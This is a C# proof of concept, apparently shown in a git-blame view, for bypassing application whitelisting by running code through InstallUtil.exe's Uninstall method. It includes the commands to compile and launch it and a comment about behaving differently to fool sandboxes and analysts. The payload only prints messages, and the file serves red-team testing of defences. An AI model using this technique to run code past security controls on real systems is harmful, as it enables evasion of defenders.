2017-10-11 10:35:17 -07:00
|
|
|
using System;
|
|
|
|
|
using System.Net;
|
|
|
|
|
using System.Diagnostics;
|
|
|
|
|
using System.Reflection;
|
|
|
|
|
using System.Configuration.Install;
|
|
|
|
|
using System.Runtime.InteropServices;
|
|
|
|
|
|
|
|
|
|
/*
|
|
|
|
|
Author: Casey Smith, Twitter: @subTee
|
|
|
|
|
License: BSD 3-Clause
|
|
|
|
|
|
|
|
|
|
Step One:
|
2018-05-07 14:18:51 -06:00
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:InstallUtilBypass.exe /target:library InstallUtilBypass.cs
|
2017-10-11 10:35:17 -07:00
|
|
|
|
|
|
|
|
Step Two:
|
2018-05-07 14:18:51 -06:00
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /U /logfile= /logtoconsole=false InstallUtilBypass.dll
|
2017-10-11 10:35:17 -07:00
|
|
|
|
|
|
|
|
|
|
|
|
|
*/
|
|
|
|
|
|
|
|
|
|
public class Program
|
|
|
|
|
{
|
|
|
|
|
public static void Main()
|
|
|
|
|
{
|
|
|
|
|
Console.WriteLine("Hey There From Main()");
|
|
|
|
|
//Add any behaviour here to throw off sandbox execution/analysts :)
|
2018-05-07 14:18:51 -06:00
|
|
|
//These binaries can exhibit one behavior when executed in sandbox, and entirely different one when invoked
|
2017-10-11 10:35:17 -07:00
|
|
|
//by InstallUtil.exe
|
2018-05-07 14:18:51 -06:00
|
|
|
|
2017-10-11 10:35:17 -07:00
|
|
|
}
|
2018-05-07 14:18:51 -06:00
|
|
|
|
2017-10-11 10:35:17 -07:00
|
|
|
}
|
|
|
|
|
|
|
|
|
|
[System.ComponentModel.RunInstaller(true)]
|
|
|
|
|
public class Sample : System.Configuration.Install.Installer
|
|
|
|
|
{
|
|
|
|
|
//The Methods can be Uninstall/Install. Install is transactional, and really unnecessary.
|
|
|
|
|
public override void Uninstall(System.Collections.IDictionary savedState)
|
|
|
|
|
{
|
2018-05-07 14:18:51 -06:00
|
|
|
|
2018-05-07 14:20:16 -06:00
|
|
|
Console.WriteLine(@"Hello There From Uninstall, If you are reading this, prevention has failed.\n");
|
2018-05-07 14:18:51 -06:00
|
|
|
|
2017-10-11 10:35:17 -07:00
|
|
|
}
|
2018-05-07 14:18:51 -06:00
|
|
|
|
2017-10-11 10:35:17 -07:00
|
|
|
}
|
